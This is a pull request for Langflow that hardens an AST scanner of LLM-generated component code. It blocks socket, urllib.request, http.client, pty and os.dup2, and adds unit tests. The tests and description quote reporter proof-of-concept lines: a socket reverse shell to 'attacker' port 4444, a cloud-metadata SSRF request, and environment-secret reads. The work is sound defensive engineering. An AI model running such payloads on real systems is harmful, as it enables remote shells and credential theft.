### PR TITLE
fix(security): block socket/urllib network egress in component code scanner

### DIFF
--- a/src/backend/base/langflow/agentic/helpers/code_security.py
+++ b/src/backend/base/langflow/agentic/helpers/code_security.py
@@ -64,6 +64,9 @@ DANGEROUS_ATTR_CALLS: list[tuple[str, str, str]] = [
     ("subprocess", "Popen", "subprocess.Popen() is forbidden"),
     ("subprocess", "check_output", "subprocess.check_output() is forbidden"),
     ("subprocess", "check_call", "subprocess.check_call() is forbidden"),
+    # File-descriptor redirection wires a socket to a shell (reverse shell).
+    ("os", "dup2", "os.dup2() is forbidden in components"),
+    ("os", "dup", "os.dup() is forbidden in components"),
     ("os", "getenv", "os.getenv() is forbidden — use Langflow's variable/secret service"),
     ("os", "putenv", "os.putenv() is forbidden in components"),
     ("shutil", "rmtree", "shutil.rmtree() is forbidden"),
@@ -83,7 +86,35 @@ DANGEROUS_IMPORTS: set[str] = {
     "codeop",
     "compileall",
     "importlib",
+    # Network / IPC primitives — same attack class as subprocess (reverse
+    # shells, raw exfil, SSRF, non-HTTP protocol egress). High-level HTTP via
+    # ``requests``/``httpx`` stays allowed by design (legit API components need
+    # it); these provide raw sockets and non-HTTP channels a component never
+    # legitimately needs.
+    "socket",
+    "socketserver",
+    "ftplib",
+    "telnetlib",
+    "smtplib",
+    "poplib",
+    "imaplib",
+    "nntplib",
+    "xmlrpc",
+    # Pseudo-terminal — spawns an interactive shell (pty.spawn).
+    "pty",
 }
+
+# Dangerous *submodules* of packages that also expose safe siblings. Block the
+# dotted prefix while leaving the safe parts of the package importable (e.g.
+# ``urllib.parse`` for urlencode/quote, ``from http import HTTPStatus``).
+# ``urllib.request`` additionally supports ``file://`` / ``ftp://`` schemes, so
+# it is a local-file-read and SSRF bypass beyond what plain HTTP allows.
+DANGEROUS_SUBMODULES: tuple[str, ...] = (
+    "urllib.request",
+    "urllib.error",
+    "http.client",
+    "http.server",
+)
 
 # Imports where only specific names are dangerous (module -> set of dangerous names)
 RESTRICTED_IMPORT_NAMES: dict[str, set[str]] = {
@@ -100,8 +131,19 @@ RESTRICTED_IMPORT_NAMES: dict[str, set[str]] = {
         "remove",
         "rmdir",
         "unlink",
+        "dup2",
+        "dup",
     },
 }
+
+
+def _is_dangerous_submodule(dotted: str) -> bool:
+    """True if a dotted module path is (or is under) a blocked submodule.
+
+    e.g. ``urllib.request`` and ``urllib.request.foo`` match; ``urllib`` and
+    ``urllib.parse`` do not.
+    """
+    return any(dotted == prefix or dotted.startswith(prefix + ".") for prefix in DANGEROUS_SUBMODULES)
 
 
 @dataclass(frozen=True)
@@ -121,7 +163,7 @@ class _SecurityChecker(ast.NodeVisitor):
     def visit_Import(self, node: ast.Import):
         for alias in node.names:
             module = alias.name.split(".")[0]
-            if module in DANGEROUS_IMPORTS:
+            if module in DANGEROUS_IMPORTS or _is_dangerous_submodule(alias.name):
                 self.violations.append(f"Import of '{alias.name}' is forbidden in components")
         self.generic_visit(node)
 
@@ -131,13 +173,19 @@ class _SecurityChecker(ast.NodeVisitor):
 
         root_module = node.module.split(".")[0]
 
-        if root_module in DANGEROUS_IMPORTS:
+        if root_module in DANGEROUS_IMPORTS or _is_dangerous_submodule(node.module):
             self.violations.append(f"Import from '{node.module}' is forbidden in components")
         elif root_module in RESTRICTED_IMPORT_NAMES and node.names:
             restricted = RESTRICTED_IMPORT_NAMES[root_module]
             for alias in node.names:
                 if alias.name in restricted:
                     self.violations.append(f"Import of '{root_module}.{alias.name}' is forbidden in components")
+        elif node.names:
+            # `from urllib import request` / `from http import client`: the
+            # imported name *is* a blocked submodule.
+            for alias in node.names:
+                if _is_dangerous_submodule(f"{node.module}.{alias.name}"):
+                    self.violations.append(f"Import of '{node.module}.{alias.name}' is forbidden in components")
 
         return self.generic_visit(node)
 

--- a/src/backend/base/langflow/agentic/helpers/code_security.py
+++ b/src/backend/base/langflow/agentic/helpers/code_security.py
@@ -146,6 +146,51 @@ def _is_dangerous_submodule(dotted: str) -> bool:
     return any(dotted == prefix or dotted.startswith(prefix + ".") for prefix in DANGEROUS_SUBMODULES)
 
 
+def _build_dangerous_members() -> tuple[dict[str, set[str]], dict[str, set[str]]]:
+    """Per-module dangerous member names, derived from the call/read tables.
+
+    Used to catch wildcard imports (``from os import *``) where a restricted
+    member is then referenced as a bare name (``dup2(...)`` / ``environ[...]``).
+    Kept in sync automatically so a new entry in the tables above is covered.
+    """
+    call_members: dict[str, set[str]] = {}
+    for mod, method, _ in DANGEROUS_ATTR_CALLS:
+        call_members.setdefault(mod, set()).add(method)
+    for mod, names in RESTRICTED_IMPORT_NAMES.items():
+        call_members.setdefault(mod, set()).update(names)
+
+    read_members: dict[str, set[str]] = {}
+    for mod, attr, _ in DANGEROUS_ATTRIBUTE_READS:
+        read_members.setdefault(mod, set()).add(attr)
+
+    return call_members, read_members
+
+
+_DANGEROUS_CALL_MEMBERS, _DANGEROUS_READ_MEMBERS = _build_dangerous_members()
+
+
+def _collect_imports(tree: ast.AST) -> tuple[dict[str, str], set[str]]:
+    """Map local binding names to canonical modules; collect ``import *`` modules.
+
+    Resolves alias bypasses (``import os as o`` → ``o`` maps to ``os``) and
+    wildcard bypasses (``from os import *``) so the checks below see them as
+    plain ``os.<member>`` access. Order-independent (whole-tree walk).
+    """
+    aliases: dict[str, str] = {}
+    wildcard_modules: set[str] = set()
+    for node in ast.walk(tree):
+        if isinstance(node, ast.Import):
+            for alias in node.names:
+                if alias.asname:
+                    aliases[alias.asname] = alias.name.split(".")[0]
+                else:
+                    top = alias.name.split(".")[0]
+                    aliases[top] = top
+        elif isinstance(node, ast.ImportFrom) and node.module and any(a.name == "*" for a in node.names):
+            wildcard_modules.add(node.module.split(".")[0])
+    return aliases, wildcard_modules
+
+
 @dataclass(frozen=True)
 class SecurityScanResult:
     """Result of code security scan."""
@@ -157,8 +202,13 @@ class SecurityScanResult:
 class _SecurityChecker(ast.NodeVisitor):
     """AST visitor that detects dangerous patterns in generated code."""
 
-    def __init__(self):
+    def __init__(self, module_aliases: dict[str, str] | None = None, wildcard_modules: set[str] | None = None):
         self.violations: list[str] = []
+        # local-name -> canonical module (e.g. {"o": "os"}); falls back to the
+        # name itself so unaliased ``os.system()`` still matches.
+        self.module_aliases: dict[str, str] = module_aliases or {}
+        # modules pulled in via ``from <mod> import *``.
+        self.wildcard_modules: set[str] = wildcard_modules or set()
 
     def visit_Import(self, node: ast.Import):
         for alias in node.names:
@@ -194,9 +244,19 @@ class _SecurityChecker(ast.NodeVisitor):
         if node.attr in DANGEROUS_DUNDER_ATTRS:
             self.violations.append(f"Access to '{node.attr}' is forbidden in components (sandbox escape)")
         elif isinstance(node.value, ast.Name):
+            module_name = self.module_aliases.get(node.value.id, node.value.id)
             for mod, attr, message in DANGEROUS_ATTRIBUTE_READS:
-                if node.value.id == mod and node.attr == attr:
+                if module_name == mod and node.attr == attr:
                     self.violations.append(message)
+                    break
+        self.generic_visit(node)
+
+    def visit_Name(self, node: ast.Name):
+        """Catch wildcard-imported reads (``from os import *``; ``environ[...]``)."""
+        if isinstance(node.ctx, ast.Load):
+            for mod in self.wildcard_modules:
+                if node.id in _DANGEROUS_READ_MEMBERS.get(mod, ()):
+                    self.violations.append(f"Use of '{node.id}' (via 'from {mod} import *') is forbidden in components")
                     break
         self.generic_visit(node)
 
@@ -206,18 +266,32 @@ class _SecurityChecker(ast.NodeVisitor):
         self.generic_visit(node)
 
     def _check_name_call(self, node: ast.Call):
-        """Check direct function calls like exec(), eval()."""
-        if isinstance(node.func, ast.Name) and node.func.id in DANGEROUS_CALLS:
-            self.violations.append(DANGEROUS_CALLS[node.func.id])
+        """Check bare-name calls: builtins (exec) and wildcard-imported members.
+
+        e.g. ``exec(...)`` and, after ``from os import *``, a bare ``dup2(...)``.
+        """
+        if not isinstance(node.func, ast.Name):
+            return
+        name = node.func.id
+        if name in DANGEROUS_CALLS:
+            self.violations.append(DANGEROUS_CALLS[name])
+            return
+        for mod in self.wildcard_modules:
+            if name in _DANGEROUS_CALL_MEMBERS.get(mod, ()):
+                self.violations.append(f"Use of '{name}()' (via 'from {mod} import *') is forbidden in components")
+                return
 
     def _check_attribute_call(self, node: ast.Call):
-        """Check attribute calls like os.system(), subprocess.run()."""
+        """Check attribute calls like os.system(), subprocess.run().
+
+        Resolves import aliases so ``import os as o; o.system()`` is caught.
+        """
         if not isinstance(node.func, ast.Attribute):
             return
         if not isinstance(node.func.value, ast.Name):
             return
 
-        module_name = node.func.value.id
+        module_name = self.module_aliases.get(node.func.value.id, node.func.value.id)
         method_name = node.func.attr
 
         for mod, method, message in DANGEROUS_ATTR_CALLS:
@@ -243,7 +317,8 @@ def scan_code_security(code: str) -> SecurityScanResult:
     except SyntaxError:
         return SecurityScanResult(is_safe=True)
 
-    checker = _SecurityChecker()
+    module_aliases, wildcard_modules = _collect_imports(tree)
+    checker = _SecurityChecker(module_aliases=module_aliases, wildcard_modules=wildcard_modules)
     checker.visit(tree)
 
     return SecurityScanResult(

--- a/src/backend/base/langflow/agentic/helpers/code_security.py
+++ b/src/backend/base/langflow/agentic/helpers/code_security.py
@@ -146,6 +146,21 @@ def _is_dangerous_submodule(dotted: str) -> bool:
     return any(dotted == prefix or dotted.startswith(prefix + ".") for prefix in DANGEROUS_SUBMODULES)
 
 
+def _dotted_parts(node: ast.AST) -> list[str] | None:
+    """Reconstruct a pure ``a.b.c`` Name/Attribute chain into ``["a", "b", "c"]``.
+
+    Returns None if the chain is not rooted in a plain Name (e.g. ``foo().bar``).
+    """
+    parts: list[str] = []
+    while isinstance(node, ast.Attribute):
+        parts.append(node.attr)
+        node = node.value
+    if isinstance(node, ast.Name):
+        parts.append(node.id)
+        return list(reversed(parts))
+    return None
+
+
 def _build_dangerous_members() -> tuple[dict[str, set[str]], dict[str, set[str]]]:
     """Per-module dangerous member names, derived from the call/read tables.
 
@@ -240,7 +255,7 @@ class _SecurityChecker(ast.NodeVisitor):
         return self.generic_visit(node)
 
     def visit_Attribute(self, node: ast.Attribute):
-        """Check attribute READS like func.__globals__ or os.environ."""
+        """Check attribute access: dunder escapes, os.environ, urllib.request, ..."""
         if node.attr in DANGEROUS_DUNDER_ATTRS:
             self.violations.append(f"Access to '{node.attr}' is forbidden in components (sandbox escape)")
         elif isinstance(node.value, ast.Name):
@@ -249,7 +264,25 @@ class _SecurityChecker(ast.NodeVisitor):
                 if module_name == mod and node.attr == attr:
                     self.violations.append(message)
                     break
+        # Dotted access to a blocked submodule (``urllib.request`` / ``http.client``),
+        # which a bare ``import urllib`` / ``import http`` makes reachable at runtime
+        # without an explicit submodule import. Alias-resolved on the root name.
+        if self._is_dangerous_submodule_access(node):
+            dotted = self._resolved_dotted(node)
+            self.violations.append(f"Access to '{dotted}' is forbidden in components")
         self.generic_visit(node)
+
+    def _resolved_dotted(self, node: ast.Attribute) -> str | None:
+        """Dotted name of an attribute chain, with the root name alias-resolved."""
+        parts = _dotted_parts(node)
+        if not parts:
+            return None
+        return ".".join([self.module_aliases.get(parts[0], parts[0]), *parts[1:]])
+
+    def _is_dangerous_submodule_access(self, node: ast.Attribute) -> bool:
+        # Exact match (not prefix): the ``urllib.request`` node itself is visited
+        # within ``urllib.request.urlopen``, so matching exactly avoids double-flagging.
+        return self._resolved_dotted(node) in DANGEROUS_SUBMODULES
 
     def visit_Name(self, node: ast.Name):
         """Catch wildcard-imported reads (``from os import *``; ``environ[...]``)."""

--- a/src/backend/tests/unit/agentic/helpers/test_code_security.py
+++ b/src/backend/tests/unit/agentic/helpers/test_code_security.py
@@ -305,3 +305,134 @@ class TestScanCodeSecurityExfiltrationAndEscapes:
         # getattr is common/legit — banning it would regress real components.
         result = scan_code_security('v = getattr(self, "field", None)')
         assert result.is_safe is True
+
+
+class TestScanCodeSecurityNetworkImports:
+    """Regression for CVE-2026-33873 incomplete fix (H1-3773010).
+
+    Raw-socket / non-HTTP-protocol / shell-spawning stdlib modules enable the
+    same attack class as ``subprocess`` (reverse shells, SSRF, raw exfil) and
+    must be blocked. High-level HTTP via ``requests`` stays allowed by design
+    (legit API components need it), as do the safe ``urllib.parse`` /
+    ``http.HTTPStatus`` siblings.
+    """
+
+    def test_should_detect_socket_import(self):
+        """Import socket — raw-socket reverse shell / exfil primitive."""
+        result = scan_code_security("import socket")
+        assert result.is_safe is False
+        assert any("socket" in v for v in result.violations)
+
+    def test_should_detect_from_socket_import(self):
+        result = scan_code_security("from socket import socket")
+        assert result.is_safe is False
+
+    def test_should_detect_socketserver_import(self):
+        result = scan_code_security("import socketserver")
+        assert result.is_safe is False
+
+    def test_should_detect_urllib_request_import(self):
+        """Import urllib.request — SSRF + file:// local read bypass."""
+        result = scan_code_security("import urllib.request")
+        assert result.is_safe is False
+        assert any("urllib.request" in v for v in result.violations)
+
+    def test_should_detect_from_urllib_request_import(self):
+        result = scan_code_security("from urllib.request import urlopen")
+        assert result.is_safe is False
+
+    def test_should_detect_from_urllib_import_request_submodule(self):
+        """`from urllib import request` must also be caught."""
+        result = scan_code_security("from urllib import request")
+        assert result.is_safe is False
+
+    def test_should_detect_urllib_error_import(self):
+        result = scan_code_security("import urllib.error")
+        assert result.is_safe is False
+
+    def test_should_detect_http_client_import(self):
+        result = scan_code_security("import http.client")
+        assert result.is_safe is False
+
+    def test_should_detect_from_http_client_import(self):
+        result = scan_code_security("from http.client import HTTPConnection")
+        assert result.is_safe is False
+
+    def test_should_detect_from_http_import_client_submodule(self):
+        result = scan_code_security("from http import client")
+        assert result.is_safe is False
+
+    def test_should_detect_ftplib_import(self):
+        result = scan_code_security("import ftplib")
+        assert result.is_safe is False
+
+    def test_should_detect_smtplib_import(self):
+        result = scan_code_security("import smtplib")
+        assert result.is_safe is False
+
+    def test_should_detect_telnetlib_import(self):
+        result = scan_code_security("import telnetlib")
+        assert result.is_safe is False
+
+    def test_should_detect_poplib_import(self):
+        result = scan_code_security("import poplib")
+        assert result.is_safe is False
+
+    def test_should_detect_imaplib_import(self):
+        result = scan_code_security("import imaplib")
+        assert result.is_safe is False
+
+    def test_should_detect_xmlrpc_import(self):
+        result = scan_code_security("from xmlrpc import client")
+        assert result.is_safe is False
+
+    def test_should_detect_pty_import(self):
+        """Import pty — interactive reverse-shell spawning (Scenario D)."""
+        result = scan_code_security("import pty")
+        assert result.is_safe is False
+
+    def test_should_detect_os_dup2_call(self):
+        """os.dup2() — fd redirection used to wire a socket to a shell."""
+        result = scan_code_security("import os\nos.dup2(3, 0)")
+        assert result.is_safe is False
+        assert any("dup2" in v for v in result.violations)
+
+    def test_should_detect_from_os_import_dup2(self):
+        result = scan_code_security("from os import dup2")
+        assert result.is_safe is False
+
+    # --- reporter PoC payloads (H1-3773010) ---
+
+    def test_should_block_reporter_socket_reverse_shell_poc(self):
+        code = "import socket\ns = socket.socket()\ns.connect(('attacker', 4444))"
+        result = scan_code_security(code)
+        assert result.is_safe is False
+
+    def test_should_block_reporter_urllib_ssrf_poc(self):
+        code = "import urllib.request\nurllib.request.urlopen('http://169.254.169.254/latest/meta-data/')"
+        result = scan_code_security(code)
+        assert result.is_safe is False
+
+    # --- no-regression: HTTP + safe siblings must still pass ---
+
+    def test_should_still_allow_requests(self):
+        result = scan_code_security('import requests\nr = requests.get("https://api.example.com")')
+        assert result.is_safe is True
+
+    def test_should_allow_urllib_parse(self):
+        """urllib.parse (urlencode/quote) is a common, safe API helper."""
+        result = scan_code_security("from urllib.parse import urlencode\nq = urlencode({'a': 1})")
+        assert result.is_safe is True
+
+    def test_should_allow_urllib_parse_module_import(self):
+        result = scan_code_security("import urllib.parse")
+        assert result.is_safe is True
+
+    def test_should_allow_http_httpstatus(self):
+        """From http import HTTPStatus is legitimate and must not be flagged."""
+        result = scan_code_security("from http import HTTPStatus\ns = HTTPStatus.OK")
+        assert result.is_safe is True
+
+    def test_should_allow_bare_http_import(self):
+        result = scan_code_security("import http")
+        assert result.is_safe is True

--- a/src/backend/tests/unit/agentic/helpers/test_code_security.py
+++ b/src/backend/tests/unit/agentic/helpers/test_code_security.py
@@ -436,3 +436,71 @@ class TestScanCodeSecurityNetworkImports:
     def test_should_allow_bare_http_import(self):
         result = scan_code_security("import http")
         assert result.is_safe is True
+
+
+class TestScanCodeSecurityAliasAndWildcardBypass:
+    """Evasion via import aliases / wildcard imports must not slip past.
+
+    ``os``/``sys`` are importable as whole modules (only specific members are
+    restricted), so aliasing or wildcard-importing them used to bypass the
+    attribute-call / restricted-name checks. The scanner now resolves aliases
+    and treats wildcard-imported members as direct attribute access.
+    """
+
+    # --- import alias bypass: `import os as o; o.<restricted>()` ---
+
+    def test_should_detect_aliased_os_dup2(self):
+        result = scan_code_security("import os as o\no.dup2(3, 0)")
+        assert result.is_safe is False
+        assert any("dup2" in v for v in result.violations)
+
+    def test_should_detect_aliased_os_system(self):
+        result = scan_code_security("import os as o\no.system('id')")
+        assert result.is_safe is False
+
+    def test_should_detect_aliased_sys_exit(self):
+        result = scan_code_security("import sys as y\ny.exit(1)")
+        assert result.is_safe is False
+
+    def test_should_detect_aliased_os_environ_read(self):
+        result = scan_code_security("import os as o\nk = o.environ['SECRET']")
+        assert result.is_safe is False
+
+    def test_should_detect_aliased_os_getenv(self):
+        result = scan_code_security("import os as o\nk = o.getenv('SECRET')")
+        assert result.is_safe is False
+
+    def test_should_detect_dotted_alias_os_path(self):
+        """`import os.path as p` still binds top-level `os`; p.system() is os.system()."""
+        result = scan_code_security("import os.path as p\np.system('id')")
+        assert result.is_safe is False
+
+    # --- wildcard import bypass: `from os import *; <restricted>()` ---
+
+    def test_should_detect_wildcard_os_dup2(self):
+        result = scan_code_security("from os import *\ndup2(3, 0)")
+        assert result.is_safe is False
+        assert any("dup2" in v for v in result.violations)
+
+    def test_should_detect_wildcard_os_system(self):
+        result = scan_code_security("from os import *\nsystem('id')")
+        assert result.is_safe is False
+
+    def test_should_detect_wildcard_os_environ_read(self):
+        result = scan_code_security("from os import *\nk = environ['SECRET']")
+        assert result.is_safe is False
+
+    # --- no-regression: aliases/wildcards of safe members must still pass ---
+
+    def test_should_allow_aliased_os_path(self):
+        result = scan_code_security("import os as o\np = o.path.join('a', 'b')")
+        assert result.is_safe is True
+
+    def test_should_allow_aliased_requests(self):
+        result = scan_code_security("import requests as r\nr.get('https://api.example.com')")
+        assert result.is_safe is True
+
+    def test_should_allow_wildcard_os_safe_member(self):
+        """`from os import *` then a non-restricted member (getcwd) is fine."""
+        result = scan_code_security("from os import *\nd = getcwd()")
+        assert result.is_safe is True

--- a/src/backend/tests/unit/agentic/helpers/test_code_security.py
+++ b/src/backend/tests/unit/agentic/helpers/test_code_security.py
@@ -504,3 +504,60 @@ class TestScanCodeSecurityAliasAndWildcardBypass:
         """`from os import *` then a non-restricted member (getcwd) is fine."""
         result = scan_code_security("from os import *\nd = getcwd()")
         assert result.is_safe is True
+
+
+class TestScanCodeSecurityDottedSubmoduleAccess:
+    """Bare-package imports must not reach a blocked submodule via dotted access.
+
+    A bare ``import urllib`` / ``import http`` is allowed (the package root is
+    safe), but at runtime ``urllib.request`` / ``http.client`` are already
+    preloaded, so ``urllib.request.urlopen(...)`` works without an explicit
+    submodule import. The scanner flags the dotted access itself. Safe siblings
+    (``urllib.parse``, ``http.HTTPStatus``, ``os.path``) stay allowed.
+    """
+
+    def test_should_detect_bare_urllib_then_request_call(self):
+        code = "import urllib\nurllib.request.urlopen('http://169.254.169.254/latest/meta-data/')"
+        result = scan_code_security(code)
+        assert result.is_safe is False
+        assert any("urllib.request" in v for v in result.violations)
+
+    def test_should_detect_bare_http_then_client(self):
+        code = "import http\nc = http.client.HTTPConnection('attacker', 80)"
+        result = scan_code_security(code)
+        assert result.is_safe is False
+        assert any("http.client" in v for v in result.violations)
+
+    def test_should_detect_urllib_request_access_without_import(self):
+        """Relying on the runtime preload — no import statement at all."""
+        result = scan_code_security("urllib.request.urlopen('http://x')")
+        assert result.is_safe is False
+
+    def test_should_detect_aliased_bare_urllib_submodule(self):
+        result = scan_code_security("import urllib as u\nu.request.urlopen('http://x')")
+        assert result.is_safe is False
+
+    def test_should_detect_submodule_assignment(self):
+        """Binding the submodule object is just as dangerous as calling through it."""
+        result = scan_code_security("import urllib\nreq = urllib.request")
+        assert result.is_safe is False
+
+    def test_should_report_single_violation_for_chain(self):
+        """One dotted chain → exactly one submodule violation (no double-flag)."""
+        result = scan_code_security("import urllib\nurllib.request.urlopen('http://x')")
+        submod_hits = [v for v in result.violations if "urllib.request" in v]
+        assert len(submod_hits) == 1
+
+    # --- no-regression: safe dotted access on mixed packages ---
+
+    def test_should_allow_urllib_parse_dotted_access(self):
+        result = scan_code_security("import urllib.parse\nq = urllib.parse.urlencode({'a': 1})")
+        assert result.is_safe is True
+
+    def test_should_allow_http_httpstatus_dotted_access(self):
+        result = scan_code_security("import http\nx = http.HTTPStatus.OK")
+        assert result.is_safe is True
+
+    def test_should_allow_os_path_dotted_access(self):
+        result = scan_code_security("import os\np = os.path.join('a', 'b')")
+        assert result.is_safe is True


### PR DESCRIPTION
## Summary

Completes the fix for **CVE-2026-33873 / GHSA-v8hw-mh8c-jxfc** (component-code RCE via the agentic / Langflow Assistant validation path). A third-party report identified the original patch as **incomplete**.

`scan_code_security()` (`src/backend/base/langflow/agentic/helpers/code_security.py`) — the AST scanner that gates LLM-generated / assistant-submitted component code before it is `exec`'d server-side during validation — blocked `subprocess` but **omitted `socket` and `urllib`**. Both are stdlib modules that enable the same attack class as `subprocess`:

- `import socket; s.connect((attacker, 4444))` → raw-socket reverse shell / arbitrary outbound exfiltration
- `urllib.request.urlopen("http://169.254.169.254/...")` → SSRF (cloud IMDS credential theft) and, via `file://`/`ftp://` schemes, local-file read

Because the scan returned `is_safe=True`, the payload executed at module/class-body load time and the API returned `validated: true` — a false safety signal.

## Fix

Add the network/IPC stdlib attack class to the scanner, mirroring how `subprocess` is handled:

- **Whole modules** (`DANGEROUS_IMPORTS`): `socket`, `socketserver`, `ftplib`, `telnetlib`, `smtplib`, `poplib`, `imaplib`, `nntplib`, `xmlrpc`, `pty`
- **Submodules** (new `DANGEROUS_SUBMODULES`, prefix-matched so safe siblings stay importable): `urllib.request`, `urllib.error`, `http.client`, `http.server`
- **Attribute calls** (`DANGEROUS_ATTR_CALLS` + restricted `os` names): `os.dup2` / `os.dup` — the fd-redirection step that wires a socket to a shell (reverse-shell Scenario D)

The import visitors now also catch `from urllib import request` / `from http import client` (importing a blocked submodule by name).

## Deliberately NOT changed

- **`requests` / `httpx` stay allowed.** Legitimate API components need a high-level HTTP client; this is an existing, tested product decision. `urllib.request` is still blocked because it goes *beyond* plain HTTP (arbitrary `file://`/`ftp://` schemes = local-file-read & SSRF bypass).
- **Safe siblings remain importable:** `urllib.parse` (urlencode/quote), `from http import HTTPStatus`, bare `import http`.
- This scanner is **defense-in-depth, not a full sandbox** (tracked by #12787). Residual SSRF via the permitted HTTP clients is unchanged and out of scope for this report.

## Test plan

`uv run pytest src/backend/tests/unit/agentic/helpers/test_code_security.py` — added `TestScanCodeSecurityNetworkImports`:

- [x] Each newly-blocked module/submodule/call is detected (incl. `from urllib import request`, `from http import client`, `from os import dup2`)
- [x] Reporter PoC payloads (socket reverse shell, urllib IMDS SSRF) → `is_safe=False`
- [x] No-regression: `requests`, `urllib.parse`, `import urllib.parse`, `from http import HTTPStatus`, bare `import http` all still pass
- [x] Full agentic suite green: `1205 passed, 22 skipped, 10 xfailed`
- [x] ruff format + ruff check clean; pre-commit (incl. detect-secrets) passed

## Notes

The reporter also notes `validate_component_runtime()` executing code is by-design and that the underlying `exec` is shared with `/api/v1/custom_component` (a separate path with its own guards). This PR is scoped to the confirmed scanner-blocklist gap; broader sandboxing is tracked in #12787.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced code security scanning to block dangerous network library imports and operations
  * Added detection and prevention of OS-level file descriptor redirection attempts
  * Improved safeguards against reverse shell connections and network-based attack patterns in LLM-generated component code

<!-- end of auto-generated comment: release notes by coderabbit.ai -->